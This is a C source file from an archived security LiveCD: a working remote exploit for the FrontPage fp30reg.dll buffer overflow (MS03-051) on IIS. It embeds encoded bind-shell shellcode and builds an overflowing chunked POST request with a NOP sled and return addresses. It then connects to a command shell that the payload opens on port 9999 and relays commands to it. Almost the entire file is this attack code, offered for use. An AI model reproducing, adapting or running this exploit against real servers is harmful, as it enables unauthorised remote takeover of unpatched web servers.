home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / webserver / iis / fp30reg.c < prev    next >
C/C++ Source or Header  |  2005-02-12  |  9KB  |  243 lines
  1.  
  2.  
  3. /*******************************************************************************
  4.  
  5. Frontpage fp30reg.dll Overflow (MS03-051) discovered by Brett Moore
  6.  
  7. Exploit by Adik < netmaniac [at] hotmail.kg >
  8.  
  9. Binds persistent command shell on port 9999
  10. Tested on             
  11.             Windows 2000 Professional SP3 English version 
  12.             (fp30reg.dll ver 4.0.2.5526)            
  13.  
  14. Greetingz/Salamchiki: fellaz in Bishkek - r0ach,acha,horsemoon :)
  15.  
  16. -[ 13/Nov/2003 ]-
  17. ********************************************************************************/
  18.  
  19.  
  20. #include <stdio.h>
  21. #include <string.h>
  22. #include <winsock.h>
  23. #pragma comment(lib,"ws2_32")
  24.  
  25. #define VER        "0.1"    
  26.  
  27. /******** bind shellcode spawns persistent shell on port 9999 *****************************/
  28. unsigned char kyrgyz_bind_code[] = {
  29.     0xEB, 0x03, 0x5D, 0xEB, 0x05, 0xE8, 0xF8, 0xFF, 0xFF, 0xFF, 0x8B, 0xC5, 0x83, 0xC0, 0x11, 0x33,
  30.     0xC9, 0x66, 0xB9, 0xC9, 0x01, 0x80, 0x30, 0x88, 0x40, 0xE2, 0xFA,
  31.     0xDD, 0x03, 0x64, 0x03, 0x7C, 0x09, 0x64, 0x08, 0x88, 0x88, 0x88, 0x60, 0xC4, 0x89, 0x88, 0x88, 
  32.     0x01, 0xCE, 0x74, 0x77, 0xFE, 0x74, 0xE0, 0x06, 0xC6, 0x86, 0x64, 0x60, 0xD9, 0x89, 0x88, 0x88, 
  33.     0x01, 0xCE, 0x4E, 0xE0, 0xBB, 0xBA, 0x88, 0x88, 0xE0, 0xFF, 0xFB, 0xBA, 0xD7, 0xDC, 0x77, 0xDE, 
  34.     0x4E, 0x01, 0xCE, 0x70, 0x77, 0xFE, 0x74, 0xE0, 0x25, 0x51, 0x8D, 0x46, 0x60, 0xB8, 0x89, 0x88, 
  35.     0x88, 0x01, 0xCE, 0x5A, 0x77, 0xFE, 0x74, 0xE0, 0xFA, 0x76, 0x3B, 0x9E, 0x60, 0xA8, 0x89, 0x88, 
  36.     0x88, 0x01, 0xCE, 0x46, 0x77, 0xFE, 0x74, 0xE0, 0x67, 0x46, 0x68, 0xE8, 0x60, 0x98, 0x89, 0x88, 
  37.     0x88, 0x01, 0xCE, 0x42, 0x77, 0xFE, 0x70, 0xE0, 0x43, 0x65, 0x74, 0xB3, 0x60, 0x88, 0x89, 0x88, 
  38.     0x88, 0x01, 0xCE, 0x7C, 0x77, 0xFE, 0x70, 0xE0, 0x51, 0x81, 0x7D, 0x25, 0x60, 0x78, 0x88, 0x88, 
  39.     0x88, 0x01, 0xCE, 0x78, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x92, 0xF8, 0x4F, 0x60, 0x68, 0x88, 0x88, 
  40.     0x88, 0x01, 0xCE, 0x64, 0x77, 0xFE, 0x70, 0xE0, 0x2C, 0x25, 0xA6, 0x61, 0x60, 0x58, 0x88, 0x88, 
  41.     0x88, 0x01, 0xCE, 0x60, 0x77, 0xFE, 0x70, 0xE0, 0x6D, 0xC1, 0x0E, 0xC1, 0x60, 0x48, 0x88, 0x88, 
  42.     0x88, 0x01, 0xCE, 0x6A, 0x77, 0xFE, 0x70, 0xE0, 0x6F, 0xF1, 0x4E, 0xF1, 0x60, 0x38, 0x88, 0x88, 
  43.     0x88, 0x01, 0xCE, 0x5E, 0xBB, 0x77, 0x09, 0x64, 0x7C, 0x89, 0x88, 0x88, 0xDC, 0xE0, 0x89, 0x89, 
  44.     0x88, 0x88, 0x77, 0xDE, 0x7C, 0xD8, 0xD8, 0xD8, 0xD8, 0xC8, 0xD8, 0xC8, 0xD8, 0x77, 0xDE, 0x78, 
  45.     0x03, 0x50, 0xDF, 0xDF, 0xE0, 0x8A, 0x88, 0xAF, 0x87, 0x03, 0x44, 0xE2, 0x9E, 0xD9, 0xDB, 0x77, 
  46.     0xDE, 0x64, 0xDF, 0xDB, 0x77, 0xDE, 0x60, 0xBB, 0x77, 0xDF, 0xD9, 0xDB, 0x77, 0xDE, 0x6A, 0x03, 
  47.     0x58, 0x01, 0xCE, 0x36, 0xE0, 0xEB, 0xE5, 0xEC, 0x88, 0x01, 0xEE, 0x4A, 0x0B, 0x4C, 0x24, 0x05, 
  48.     0xB4, 0xAC, 0xBB, 0x48, 0xBB, 0x41, 0x08, 0x49, 0x9D, 0x23, 0x6A, 0x75, 0x4E, 0xCC, 0xAC, 0x98, 
  49.     0xCC, 0x76, 0xCC, 0xAC, 0xB5, 0x01, 0xDC, 0xAC, 0xC0, 0x01, 0xDC, 0xAC, 0xC4, 0x01, 0xDC, 0xAC, 
  50.     0xD8, 0x05, 0xCC, 0xAC, 0x98, 0xDC, 0xD8, 0xD9, 0xD9, 0xD9, 0xC9, 0xD9, 0xC1, 0xD9, 0xD9, 0x77, 
  51.     0xFE, 0x4A, 0xD9, 0x77, 0xDE, 0x46, 0x03, 0x44, 0xE2, 0x77, 0x77, 0xB9, 0x77, 0xDE, 0x5A, 0x03, 
  52.     0x40, 0x77, 0xFE, 0x36, 0x77, 0xDE, 0x5E, 0x63, 0x16, 0x77, 0xDE, 0x9C, 0xDE, 0xEC, 0x29, 0xB8, 
  53.     0x88, 0x88, 0x88, 0x03, 0xC8, 0x84, 0x03, 0xF8, 0x94, 0x25, 0x03, 0xC8, 0x80, 0xD6, 0x4A, 0x8C, 
  54.     0x88, 0xDB, 0xDD, 0xDE, 0xDF, 0x03, 0xE4, 0xAC, 0x90, 0x03, 0xCD, 0xB4, 0x03, 0xDC, 0x8D, 0xF0, 
  55.     0x8B, 0x5D, 0x03, 0xC2, 0x90, 0x03, 0xD2, 0xA8, 0x8B, 0x55, 0x6B, 0xBA, 0xC1, 0x03, 0xBC, 0x03, 
  56.     0x8B, 0x7D, 0xBB, 0x77, 0x74, 0xBB, 0x48, 0x24, 0xB2, 0x4C, 0xFC, 0x8F, 0x49, 0x47, 0x85, 0x8B, 
  57.     0x70, 0x63, 0x7A, 0xB3, 0xF4, 0xAC, 0x9C, 0xFD, 0x69, 0x03, 0xD2, 0xAC, 0x8B, 0x55, 0xEE, 0x03, 
  58.     0x84, 0xC3, 0x03, 0xD2, 0x94, 0x8B, 0x55, 0x03, 0x8C, 0x03, 0x8B, 0x4D, 0x63, 0x8A, 0xBB, 0x48, 
  59.     0x03, 0x5D, 0xD7, 0xD6, 0xD5, 0xD3, 0x4A, 0x8C, 0x88
  60. };
  61.  
  62. void cmdshell (int sock);
  63. long gimmeip(char *hostname);
  64.  
  65. int main(int argc,char *argv[])
  66. {     
  67.         WSADATA wsaData;
  68.         struct sockaddr_in targetTCP;
  69.         struct hostent *host;
  70.         int sockTCP,s;
  71.         unsigned short port = 80;
  72.         long ip;
  73.         unsigned char header[]=    "POST /_vti_bin/_vti_aut/fp30reg.dll HTTP/1.1\r\n";
  74.         unsigned char packet[3000],data[1500];                        
  75.         unsigned char ecx[] = "\xe0\xf3\xd4\x67";
  76.         unsigned char edi[] = "\xff\xd0\x90\x90";        
  77.         unsigned char call[] = "\xe4\xf3\xd4\x67";//overwrite .data section of fp30reg.dll
  78.         unsigned char shortjmp[] = "\xeb\x10";
  79.         
  80.         printf("\n-={ Frontpage fp30reg.dll Overflow Exploit (MS03-051) ver %s }=-\n\n"
  81.                    " by Adik < netmaniac [at] hotmail.KG >\n http://netninja.to.kg\n\n", VER);
  82.         if(argc < 2)
  83.         {
  84.             
  85.             printf(" Usage: %s [Target] <port>\n"
  86.                     " eg: fp30reg.exe 192.168.63.130\n\n",argv[0]);
  87.             return 1;            
  88.         }        
  89.         if(argc==3)
  90.             port = atoi(argv[2]);                    
  91.         WSAStartup(0x0202, &wsaData);                
  92.         printf("[*] Target:\t%s \tPort: %d\n\n",argv[1],port);
  93.         ip=gimmeip(argv[1]);    
  94.         memset(&targetTCP, 0, sizeof(targetTCP));
  95.         memset(packet,0,sizeof(packet));
  96.         targetTCP.sin_family = AF_INET;
  97.         targetTCP.sin_addr.s_addr = ip;
  98.         targetTCP.sin_port = htons(port);                
  99.         sprintf(packet,"%sHost: %s\r\nTransfer-Encoding: chunked\r\n",header,argv[1]);        
  100.         memset(data, 0x90, sizeof(data)-1);
  101.         data[sizeof(data)-1] = '\x0';
  102.         memcpy(&data[16],edi,sizeof(edi)-1);
  103.         memcpy(&data[20],ecx,sizeof(ecx)-1);        
  104.         memcpy(&data[250+10],shortjmp,sizeof(shortjmp)-1);
  105.         memcpy(&data[250+14],call,sizeof(call)-1);        
  106.         memcpy(&data[250+70],kyrgyz_bind_code,sizeof(kyrgyz_bind_code));
  107.         sprintf(packet,"%sContent-Length: %d\r\n\r\n%x\r\n%s\r\n0\r\n\r\n",packet,strlen(data),strlen(data),data);        
  108.         if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  109.         {
  110.                 printf("[x] Socket not initialized! Exiting...\n");
  111.                 WSACleanup();
  112.                 return 1;
  113.         }
  114.         printf("[*] Socket initialized...\n");                    
  115.         if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
  116.         {
  117.             printf("[*] Connection to host failed! Exiting...\n");
  118.             WSACleanup();
  119.             exit(1);
  120.         }         
  121.         printf("[*] Checking for presence of fp30reg.dll...");
  122.         if (send(sockTCP, packet, strlen(packet),0) == -1)
  123.         {
  124.                 printf("[x] Failed to inject packet! Exiting...\n");
  125.                 WSACleanup();
  126.                 return 1;
  127.         }        
  128.         memset(packet,0,sizeof(packet));    
  129.         if (recv(sockTCP, packet, sizeof(packet),0) == -1)        
  130.         {
  131.                 printf("[x] Failed to receive packet! Exiting...\n");
  132.                 WSACleanup();
  133.                 return 1;
  134.         }                
  135.         if(packet[9]=='1' && packet[10]=='0' && packet[11]=='0')
  136.             printf(" Found!\n");
  137.         else
  138.         {
  139.             printf(" Not Found!! Exiting...\n");
  140.             WSACleanup();
  141.             return 1;
  142.         }
  143.         printf("[*] Packet injected!\n");
  144.         closesocket(sockTCP);
  145.         printf("[*] Sleeping ");
  146.         for(s=0;s<13000;s+=1000)
  147.         {
  148.             printf(". ");
  149.             Sleep(1000);
  150.         }        
  151.         printf("\n[*] Connecting to host: %s on port 9999",argv[1]);
  152.         if ((sockTCP = socket(AF_INET, SOCK_STREAM, 0)) == -1)
  153.         {
  154.                 printf("\n[x] Socket not initialized! Exiting...\n");
  155.                 WSACleanup();
  156.                 return 1;
  157.         }        
  158.         targetTCP.sin_family = AF_INET;
  159.         targetTCP.sin_addr.s_addr = ip;
  160.         targetTCP.sin_port = htons(9999);
  161.         if(connect(sockTCP,(struct sockaddr *)&targetTCP, sizeof(targetTCP)) != 0)
  162.         {
  163.             printf("\n[x] Exploit failed or there is a Firewall! Exiting...\n");
  164.             WSACleanup();
  165.             exit(1);
  166.         } 
  167.         printf("\n[*] Dropping to shell...\n\n");
  168.         cmdshell(sockTCP);
  169.         return 0;
  170. }
  171. /*********************************************************************************/
  172. void cmdshell (int sock)
  173. {
  174.  struct timeval tv;
  175.  int length;
  176.  unsigned long o[2];
  177.  char buffer[1000];
  178.  
  179.  tv.tv_sec = 1;
  180.  tv.tv_usec = 0;
  181.  
  182.  while (1) 
  183.  {
  184.     o[0] = 1;
  185.     o[1] = sock;    
  186.  
  187.     length = select (0, (fd_set *)&o, NULL, NULL, &tv);
  188.     if(length == 1)
  189.     {
  190.         length = recv (sock, buffer, sizeof (buffer), 0);
  191.         if (length <= 0) 
  192.         {
  193.             printf ("[x] Connection closed.\n");
  194.             WSACleanup();
  195.             return;
  196.         }
  197.         length = write (1, buffer, length);
  198.         if (length <= 0) 
  199.         {
  200.             printf ("[x] Connection closed.\n");
  201.             WSACleanup();
  202.             return;
  203.         }
  204.     }
  205.     else
  206.     {
  207.         length = read (0, buffer, sizeof (buffer));
  208.         if (length <= 0) 
  209.         {
  210.             printf("[x] Connection closed.\n");
  211.             WSACleanup();
  212.             return;
  213.         }
  214.         length = send(sock, buffer, length, 0);
  215.         if (length <= 0) 
  216.         {
  217.             printf("[x] Connection closed.\n");
  218.             WSACleanup();
  219.             return;
  220.         }
  221.     }
  222. }
  223.  
  224. }
  225. /*********************************************************************************/
  226. long gimmeip(char *hostname) 
  227. {
  228.     struct hostent *he;
  229.     long ipaddr;
  230.     
  231.     if ((ipaddr = inet_addr(hostname)) < 0) 
  232.     {
  233.         if ((he = gethostbyname(hostname)) == NULL) 
  234.         {
  235.             printf("[x] Failed to resolve host: %s! Exiting...\n\n",hostname);
  236.             WSACleanup();
  237.             exit(1);
  238.         }
  239.         memcpy(&ipaddr, he->h_addr, he->h_length);
  240.     }    
  241.     return ipaddr;
  242. }
  243. /*********************************************************************************/